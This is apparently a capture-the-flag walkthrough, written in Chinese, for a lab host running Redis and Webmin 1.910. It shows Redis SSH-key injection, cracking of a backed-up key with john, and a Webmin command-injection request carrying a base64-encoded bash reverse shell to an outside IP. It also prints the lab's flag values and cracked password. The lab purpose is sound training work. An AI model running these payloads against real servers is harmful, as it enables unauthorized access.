信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.160 | TCP:22,80,6379,10000 |
$ nmap -p- 10.10.10.160 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
redis未授权访问 & SSH公钥注入
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> CONFIG GET *
10.10.10.160:6379> CONFIG GET dir
10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh
证明目录存在
$ cat ~/.ssh/id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOAuKxlopDqsLWIAFeZFEOiSBz9K/go+OybYs5gwGEBE maptnh@maptnh
$ (echo -e "\n\n";cat ~/.ssh/id_ed25519.pub;echo -e "\n\n")>key.txt;cat key.txt | redis-cli -h 10.10.10.160 -x set id_rsa_key
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> GET id_rsa_key
10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh
10.10.10.160:6379> CONFIG SET dbfilename authorized_keys
10.10.10.160:6379> save
10.10.10.160:6379> exit
使用 CONFIG SET 指令来设置 dir 和 dbfilename 配置项,通常是用于设置 Redis 数据库的持久化文件路径和文件名。这将导致 Redis 将数据以 authorized_keys 文件的形式保存到指定目录中。
$ ssh -i ~/.ssh/id_ed25519 redis@10.10.10.160
RSA私钥解密
$ cat /opt/id_rsa.bak
$ ssh2john id_rsa >./id_rsa.john
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john
password:computer2008
$ su Matt
User.txt
9d90e967236578fdf6be43ea87c03a53
权限提升
$ whatweb https://10.10.10.160:10000 -v
$ searchsploit Webmin
https://github.com/KentVolt/Webmin-1.910-Exploit/blob/master/Webmin%201.910%20-%20Remote%20Code%20Execution%20using%20BurpSuite
https://10.10.10.160:10000/
username:Matt password:computer2008
https://10.10.10.160:10000/package-updates/?xnavigation=1
$ sudo tcpdump -i any icmp
POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.160:10000
Cookie: redirect=1; testing=1; sid=43462a3948984572e11138d45052c3d8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Progressive-Url: https://10.10.10.160:10000/package-updates/update.cgi
X-Requested-From: package-updates
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Length: 19
Origin: https://10.10.10.160:10000
Referer: https://10.10.10.160:10000/package-updates/update.cgi?xnavigation=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
u=acl%2Fapt&u=$(ping%20-c%201%2010.10.16.14)
u=acl%2Fapt&u=$(echo${IFS}"L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTQvMTAwMzUgMD4mMScK"|base64${IFS}-d|bash)
Root.txt
ded02459b6863f771d4371e25ee2c11c
![二十天刷leetcode【hot100】算法- day1[后端golang]](https://i-blog.csdnimg.cn/direct/247599f2ca1040459a629782695463fb.jpeg)
